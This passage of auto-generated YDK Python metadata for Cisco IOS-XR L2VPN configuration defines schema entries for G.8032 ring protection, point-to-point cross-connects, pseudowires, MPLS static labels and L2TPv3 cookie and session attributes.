_MetaInfoClassMember('none', REFERENCE_CLASS, 'None_' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.G8032Rings.G8032Ring.ErpPort1S.ErpPort1.None_',
[], [],
''' none
''',
'none',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('virtual-or-interface', REFERENCE_LIST, 'VirtualOrInterface' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.G8032Rings.G8032Ring.ErpPort1S.ErpPort1.VirtualOrInterface',
[], [],
''' virtual or interface
''',
'virtual_or_interface',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'erp-port1',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.G8032Rings.G8032Ring.ErpPort1S' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.G8032Rings.G8032Ring.ErpPort1S',
False,
[
_MetaInfoClassMember('erp-port1', REFERENCE_LIST, 'ErpPort1' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.G8032Rings.G8032Ring.ErpPort1S.ErpPort1',
[], [],
''' Ethernet ring protection port1
''',
'erp_port1',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'erp-port1s',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.G8032Rings.G8032Ring' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.G8032Rings.G8032Ring',
False,
[
_MetaInfoClassMember('g8032-ring-name', ATTRIBUTE, 'str' , None, None,
[(0, 32)], [],
''' Name of the G8032 ring
''',
'g8032_ring_name',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('erp-instances', REFERENCE_CLASS, 'ErpInstances' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.G8032Rings.G8032Ring.ErpInstances',
[], [],
''' List of ethernet ring protection instance
''',
'erp_instances',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('erp-port0s', REFERENCE_CLASS, 'ErpPort0S' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.G8032Rings.G8032Ring.ErpPort0S',
[], [],
''' Ethernet ring protection port0
''',
'erp_port0s',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('erp-port1s', REFERENCE_CLASS, 'ErpPort1S' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.G8032Rings.G8032Ring.ErpPort1S',
[], [],
''' Ethernet ring protection port0
''',
'erp_port1s',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('erp-provider-bridge', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Ethernet ring protection provider bridge
''',
'erp_provider_bridge',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('exclusion-list', ATTRIBUTE, 'str' , None, None,
[], [],
''' Vlan IDs in the format of a-b,c,d,e-f,g
,untagged
''',
'exclusion_list',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('open-ring', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Specify the G.8032 instance as open ring
''',
'open_ring',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'g8032-ring',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.G8032Rings' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.G8032Rings',
False,
[
_MetaInfoClassMember('g8032-ring', REFERENCE_LIST, 'G8032Ring' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.G8032Rings.G8032Ring',
[], [],
''' G8032 Ring
''',
'g8032_ring',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'g8032-rings',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.BackupAttachmentCircuits.BackupAttachmentCircuit' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.BackupAttachmentCircuits.BackupAttachmentCircuit',
False,
[
_MetaInfoClassMember('interface-name', ATTRIBUTE, 'str' , None, None,
[], ['(([a-zA-Z0-9_]*\\d+/){3,4}\\d+)|(([a-zA-Z0-9_]*\\d+/){3,4}\\d+\\.\\d+)|(([a-zA-Z0-9_]*\\d+/){2}([a-zA-Z0-9_]*\\d+))|(([a-zA-Z0-9_]*\\d+/){2}([a-zA-Z0-9_]+))|([a-zA-Z0-9_-]*\\d+)|([a-zA-Z0-9_-]*\\d+\\.\\d+)|(mpls)|(dwdm)'],
''' Name of the attachment circuit interface
''',
'interface_name',
'Cisco-IOS-XR-l2vpn-cfg', True),
],
'Cisco-IOS-XR-l2vpn-cfg',
'backup-attachment-circuit',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.BackupAttachmentCircuits' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.BackupAttachmentCircuits',
False,
[
_MetaInfoClassMember('backup-attachment-circuit', REFERENCE_LIST, 'BackupAttachmentCircuit' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.BackupAttachmentCircuits.BackupAttachmentCircuit',
[], [],
''' Backup attachment circuit
''',
'backup_attachment_circuit',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'backup-attachment-circuits',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.PseudowireEvpns.PseudowireEvpn' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.PseudowireEvpns.PseudowireEvpn',
False,
[
_MetaInfoClassMember('eviid', ATTRIBUTE, 'int' , None, None,
[('1', '65534')], [],
''' Ethernet VPN ID
''',
'eviid',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('remote-acid', ATTRIBUTE, 'int' , None, None,
[('1', '16777215')], [],
''' Remote AC ID
''',
'remote_acid',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('source-acid', ATTRIBUTE, 'int' , None, None,
[('1', '16777215')], [],
''' Source AC ID
''',
'source_acid',
'Cisco-IOS-XR-l2vpn-cfg', True),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pseudowire-evpn',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.PseudowireEvpns' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.PseudowireEvpns',
False,
[
_MetaInfoClassMember('pseudowire-evpn', REFERENCE_LIST, 'PseudowireEvpn' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.PseudowireEvpns.PseudowireEvpn',
[], [],
''' EVPN P2P Service Configuration
''',
'pseudowire_evpn',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pseudowire-evpns',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.MplsStaticLabels' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.MplsStaticLabels',
False,
[
_MetaInfoClassMember('local-static-label', ATTRIBUTE, 'int' , None, None,
[('16', '1048575')], [],
''' Pseudowire local static label
''',
'local_static_label',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('remote-static-label', ATTRIBUTE, 'int' , None, None,
[('16', '1048575')], [],
''' Pseudowire remote static label
''',
'remote_static_label',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'mpls-static-labels',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.BackupPseudowires.BackupPseudowire.BackupMplsStaticLabels' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.BackupPseudowires.BackupPseudowire.BackupMplsStaticLabels',
False,
[
_MetaInfoClassMember('local-static-label', ATTRIBUTE, 'int' , None, None,
[('16', '1048575')], [],
''' Pseudowire local static label
''',
'local_static_label',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('remote-static-label', ATTRIBUTE, 'int' , None, None,
[('16', '1048575')], [],
''' Pseudowire remote static label
''',
'remote_static_label',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'backup-mpls-static-labels',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.BackupPseudowires.BackupPseudowire' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.BackupPseudowires.BackupPseudowire',
False,
[
_MetaInfoClassMember('neighbor', ATTRIBUTE, 'str' , None, None,
[], ['(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'],
''' Neighbor IP address
''',
'neighbor',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('pseudowire-id', ATTRIBUTE, 'int' , None, None,
[('1', '4294967295')], [],
''' Pseudowire ID
''',
'pseudowire_id',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('backup-mpls-static-labels', REFERENCE_CLASS, 'BackupMplsStaticLabels' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.BackupPseudowires.BackupPseudowire.BackupMplsStaticLabels',
[], [],
''' MPLS static labels
''',
'backup_mpls_static_labels',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('backup-pw-class', ATTRIBUTE, 'str' , None, None,
[(0, 32)], [],
''' PW class template name to use for the
backup PW
''',
'backup_pw_class',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'backup-pseudowire',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.BackupPseudowires' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.BackupPseudowires',
False,
[
_MetaInfoClassMember('backup-pseudowire', REFERENCE_LIST, 'BackupPseudowire' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.BackupPseudowires.BackupPseudowire',
[], [],
''' Backup pseudowire for the cross connect
''',
'backup_pseudowire',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'backup-pseudowires',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.L2TpStaticAttributes.L2TpRemoteCookie' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.L2TpStaticAttributes.L2TpRemoteCookie',
False,
[
_MetaInfoClassMember('higher-value', ATTRIBUTE, 'int' , None, None,
[('0', '4294967295')], [],
''' Higher remote cookie value
''',
'higher_value',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('lower-value', ATTRIBUTE, 'int' , None, None,
[('0', '4294967295')], [],
''' Lower remote cookie value
''',
'lower_value',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('size', REFERENCE_ENUM_CLASS, 'L2TpCookieSizeEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2TpCookieSizeEnum',
[], [],
''' Remote cookie size
''',
'size',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'l2tp-remote-cookie',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.L2TpStaticAttributes.L2TpSecondaryLocalCookie' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.L2TpStaticAttributes.L2TpSecondaryLocalCookie',
False,
[
_MetaInfoClassMember('higher-value', ATTRIBUTE, 'int' , None, None,
[('0', '4294967295')], [],
''' Higher local cookie value
''',
'higher_value',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('lower-value', ATTRIBUTE, 'int' , None, None,
[('0', '4294967295')], [],
''' Lower local cookie value
''',
'lower_value',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('size', REFERENCE_ENUM_CLASS, 'L2TpCookieSizeEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2TpCookieSizeEnum',
[], [],
''' Local cookie size
''',
'size',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'l2tp-secondary-local-cookie',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.L2TpStaticAttributes.L2TpLocalCookie' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.L2TpStaticAttributes.L2TpLocalCookie',
False,
[
_MetaInfoClassMember('higher-value', ATTRIBUTE, 'int' , None, None,
[('0', '4294967295')], [],
''' Higher local cookie value
''',
'higher_value',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('lower-value', ATTRIBUTE, 'int' , None, None,
[('0', '4294967295')], [],
''' Lower local cookie value
''',
'lower_value',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('size', REFERENCE_ENUM_CLASS, 'L2TpCookieSizeEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2TpCookieSizeEnum',
[], [],
''' Local cookie size
''',
'size',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'l2tp-local-cookie',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.L2TpStaticAttributes' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.L2TpStaticAttributes',
False,
[
_MetaInfoClassMember('l2tp-local-cookie', REFERENCE_CLASS, 'L2TpLocalCookie' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.L2TpStaticAttributes.L2TpLocalCookie',
[], [],
''' L2TP local cookie
''',
'l2tp_local_cookie',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('l2tp-local-session-id', ATTRIBUTE, 'int' , None, None,
[('1', '65535')], [],
''' L2TP local session ID
''',
'l2tp_local_session_id',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('l2tp-remote-cookie', REFERENCE_CLASS, 'L2TpRemoteCookie' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.L2TpStaticAttributes.L2TpRemoteCookie',
[], [],
''' L2TP remote cookie
''',
'l2tp_remote_cookie',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('l2tp-remote-session-id', ATTRIBUTE, 'int' , None, None,
[('1', '65535')], [],
''' L2TP remote session ID
''',
'l2tp_remote_session_id',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('l2tp-secondary-local-cookie', REFERENCE_CLASS, 'L2TpSecondaryLocalCookie' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.L2TpStaticAttributes.L2TpSecondaryLocalCookie',
[], [],
''' L2TP secondary local cookie
''',
'l2tp_secondary_local_cookie',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'l2tp-static-attributes',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.L2TpStatic' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.L2TpStatic',
False,
[
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable pseudowire L2TPv3 static
configuration
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'l2tp-static',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor',
False,
[
_MetaInfoClassMember('neighbor', ATTRIBUTE, 'str' , None, None,
[], ['(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'],
''' Pseudowire IPv4 address
''',
'neighbor',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('backup-pseudowires', REFERENCE_CLASS, 'BackupPseudowires' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.BackupPseudowires',
[], [],
''' List of pseudowires
''',
'backup_pseudowires',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('bandwidth', ATTRIBUTE, 'int' , None, None,
[('0', '4294967295')], [],
''' Pseudowire Bandwidth
''',
'bandwidth',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('class', ATTRIBUTE, 'str' , None, None,
[(0, 32)], [],
''' Name of the pseudowire class
''',
'class_',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('l2tp-static', REFERENCE_CLASS, 'L2TpStatic' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.L2TpStatic',
[], [],
''' Pseudowire L2TPv3 static configuration
''',
'l2tp_static',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('l2tp-static-attributes', REFERENCE_CLASS, 'L2TpStaticAttributes' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.L2TpStaticAttributes',
[], [],
''' L2TP Static Attributes
''',
'l2tp_static_attributes',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('mpls-static-labels', REFERENCE_CLASS, 'MplsStaticLabels' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.MplsStaticLabels',
[], [],
''' MPLS static labels
''',
'mpls_static_labels',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('source-address', REFERENCE_UNION, 'str' , None, None,
[], [],
''' Value of the Pseudowire source address.
Must be IPv6 only.
''',
'source_address',
'Cisco-IOS-XR-l2vpn-cfg', False, [
_MetaInfoClassMember('source-address', ATTRIBUTE, 'str' , None, None,
[], ['(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'],
''' Value of the Pseudowire source address.
Must be IPv6 only.
''',
'source_address',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('source-address', ATTRIBUTE, 'str' , None, None,
[], ['((:|[0-9a-fA-F]{0,4}):)([0-9a-fA-F]{0,4}:){0,5}((([0-9a-fA-F]{0,4}:)?(:|[0-9a-fA-F]{0,4}))|(((25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])\\.){3}(25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])))(%[\\p{N}\\p{L}]+)?'],
''' Value of the Pseudowire source address.
Must be IPv6 only.
''',
'source_address',
'Cisco-IOS-XR-l2vpn-cfg', False),
]),
_MetaInfoClassMember('tag-impose', ATTRIBUTE, 'int' , None, None,
[('1', '4094')], [],
''' Tag Impose vlan tagged mode
''',
'tag_impose',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'neighbor',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.MplsStaticLabels' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.MplsStaticLabels',
False,
[
_MetaInfoClassMember('local-static-label', ATTRIBUTE, 'int' , None, None,
[('16', '1048575')], [],
''' Pseudowire local static label
''',
'local_static_label',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('remote-static-label', ATTRIBUTE, 'int' , None, None,
[('16', '1048575')], [],
''' Pseudowire remote static label
''',
'remote_static_label',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'mpls-static-labels',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.BackupPseudowires.BackupPseudowire.BackupMplsStaticLabels' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.BackupPseudowires.BackupPseudowire.BackupMplsStaticLabels',
False,
[
_MetaInfoClassMember('local-static-label', ATTRIBUTE, 'int' , None, None,
[('16', '1048575')], [],
''' Pseudowire local static label
''',
'local_static_label',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('remote-static-label', ATTRIBUTE, 'int' , None, None,
[('16', '1048575')], [],
''' Pseudowire remote static label
''',
'remote_static_label',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'backup-mpls-static-labels',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.BackupPseudowires.BackupPseudowire' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.BackupPseudowires.BackupPseudowire',
False,
[
_MetaInfoClassMember('neighbor', ATTRIBUTE, 'str' , None, None,
[], ['(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'],
''' Neighbor IP address
''',
'neighbor',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('pseudowire-id', ATTRIBUTE, 'int' , None, None,
[('1', '4294967295')], [],
''' Pseudowire ID
''',
'pseudowire_id',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('backup-mpls-static-labels', REFERENCE_CLASS, 'BackupMplsStaticLabels' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.BackupPseudowires.BackupPseudowire.BackupMplsStaticLabels',
[], [],
''' MPLS static labels
''',
'backup_mpls_static_labels',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('backup-pw-class', ATTRIBUTE, 'str' , None, None,
[(0, 32)], [],
''' PW class template name to use for the
backup PW
''',
'backup_pw_class',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'backup-pseudowire',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.BackupPseudowires' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.BackupPseudowires',
False,
[
